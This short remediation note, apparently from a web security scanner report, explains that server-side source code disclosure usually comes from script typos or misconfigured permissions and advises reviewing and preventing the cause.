Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.